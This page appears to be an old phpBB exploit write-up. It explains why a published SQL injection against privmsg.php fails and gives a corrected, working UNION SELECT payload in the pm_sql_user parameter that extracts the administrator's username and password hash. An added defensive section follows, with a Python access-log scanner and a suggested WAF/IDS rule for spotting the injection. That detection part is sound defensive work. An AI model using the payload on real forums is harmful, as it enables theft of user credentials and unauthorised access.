http://www.really-fine.com/SQL_union.html
phpbb union sql injection
The exploit included in the BugTraq post DOES NOT work. Here is why.
In his exploit, both the TO and FROM fields are used to hold the username and MD5 hash. The problem is that each of those fields can hold at most 25 characters.
Most of you might be saying "Well, an MD5 hash is 32 bytes." You are correct. So you may get an incomplete hash, but an incomplete hash cannot be cracked.
Now let's look at how to get it to work. Let's have a look at the table structure of phpbb_privmsgs. We need a place that will hold at LEAST 32 bytes. Well, the subject field is varchar(255), so let's go ahead and put the username there.
Now we place the password in privmsgs_text and we are good to go :)
CODE
/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND pm.privmsgs_type=-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,user_password FROM phpbb_users WHERE user_id=2 LIMIT 1/*
That's all there is to it :)
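From the defender's side, a request like the one above stands out in web-server access logs: privmsg.php is being called with a pm_sql_user parameter that a browser never sends, and its value carries a UNION SELECT. The following Python scanner is an added example, not code from the original post or from phpBB; the Apache-style log lines it parses are constructed for the demonstration, and the flagged line uses a shortened, non-working variant of the payload.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (assumption: Apache combined-style format).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2005:10:01:02 +0000] "GET /phpBB2/privmsg.php?folder=inbox&mode=read&p=12 HTTP/1.1" 200 5120
10.0.0.9 - - [12/Mar/2005:10:01:45 +0000] "GET /phpBB2/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type%3D-99%20UNION%20SELECT%200,0,0,username,0,user_password%20FROM%20phpbb_users%20WHERE%20user_id%3D2%20LIMIT%201/* HTTP/1.1" 200 6230
10.0.0.7 - - [12/Mar/2005:10:02:10 +0000] "GET /phpBB2/viewtopic.php?t=5 HTTP/1.1" 200 8000
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# UNION [ALL] SELECT with whitespace or inline-comment filler between the keywords.
UNION_RE = re.compile(r'\bunion\b[\s/*]+(?:all[\s/*]+)?select\b', re.IGNORECASE)


def inspect_request(target):
    """Return a finding for a privmsg.php request that smuggles SQL via pm_sql_user, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith('/privmsg.php'):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)  # also URL-decodes the values
    # pm_sql_user is an internal variable in this code path; a client supplying it is
    # already suspicious, and a UNION SELECT inside it is the injection described above.
    if 'pm_sql_user' not in params:
        return None
    value = params['pm_sql_user'][0]
    return {
        'path': parts.path,
        'param': 'pm_sql_user',
        'union_select': bool(UNION_RE.search(value)),
        'comment_terminator': value.rstrip().endswith('/*'),
    }


def scan_log(text):
    """Scan access-log text and return one finding per suspicious request, with line and client."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        finding = inspect_request(m.group('target'))
        if finding:
            finding['line'] = lineno
            finding['client'] = line.split()[0]
            findings.append(finding)
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f)
```

The same check can be turned into a WAF or IDS rule: alert on any client-supplied pm_sql_user, and escalate when the decoded value matches UNION_RE.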
